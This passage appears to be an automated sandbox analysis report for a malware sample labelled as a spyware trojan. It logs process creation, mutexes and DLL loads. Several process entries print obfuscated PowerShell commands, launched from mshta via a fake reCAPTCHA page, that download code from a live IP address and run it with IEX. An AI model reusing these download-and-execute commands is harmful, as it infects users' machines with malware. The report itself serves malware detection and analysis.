                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0040A91013_2_0040A910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0044191013_2_00441910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0040392013_2_00403920
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0043912C13_2_0043912C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004091C013_2_004091C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004161DF13_2_004161DF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004311E613_2_004311E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0043218813_2_00432188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0040619013_2_00406190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0042F19513_2_0042F195
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004421B013_2_004421B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041E25013_2_0041E250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00441A5613_2_00441A56
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00427A5013_2_00427A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041B20013_2_0041B200
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004042D013_2_004042D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041BAD013_2_0041BAD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00433AD013_2_00433AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00431A8813_2_00431A88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00441A9413_2_00441A94
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041AA9013_2_0041AA90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00442A9013_2_00442A90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004082A013_2_004082A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041CAA013_2_0041CAA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0043CAA713_2_0043CAA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004412B113_2_004412B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00441B4013_2_00441B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041C37013_2_0041C370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00420B1013_2_00420B10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00402B2013_2_00402B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00411B2013_2_00411B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0042ABC013_2_0042ABC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00441BD013_2_00441BD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004273A013_2_004273A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0042044013_2_00420440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0043AC4013_2_0043AC40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041044613_2_00410446
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041745113_2_00417451
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00441C6013_2_00441C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0044246013_2_00442460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041947013_2_00419470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00404C0013_2_00404C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0040740013_2_00407400
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0043C41013_2_0043C410
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0042ECD013_2_0042ECD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00439CD813_2_00439CD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00440CD813_2_00440CD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00414C9C13_2_00414C9C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0042CCA013_2_0042CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0040E4B013_2_0040E4B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00426D7013_2_00426D70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00428D7613_2_00428D76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041A57413_2_0041A574
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00422D1713_2_00422D17
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00405DC013_2_00405DC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004245C013_2_004245C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00442DE013_2_00442DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004165EE13_2_004165EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041559013_2_00415590
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004095A013_2_004095A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00415E4213_2_00415E42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00423E4413_2_00423E44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00413E5013_2_00413E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041BE0013_2_0041BE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0040662013_2_00406620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0042DEE513_2_0042DEE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00402EF013_2_00402EF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0043EE8013_2_0043EE80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0040D69013_2_0040D690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0043AEA013_2_0043AEA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0043974A13_2_0043974A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041971013_2_00419710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041F71013_2_0041F710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041C7D013_2_0041C7D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004427E013_2_004427E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00427F8D13_2_00427F8D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0043B7B013_2_0043B7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00413E40 appears 128 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00407F90 appears 52 times
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@20/19@13/4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00430050 CoCreateInstance,13_2_00430050
                  Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\recaptcha-verify[1].htmJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1988:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\3e74489724f9
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1536:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4256:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uc2khghg.lt3.ps1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.htmlJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
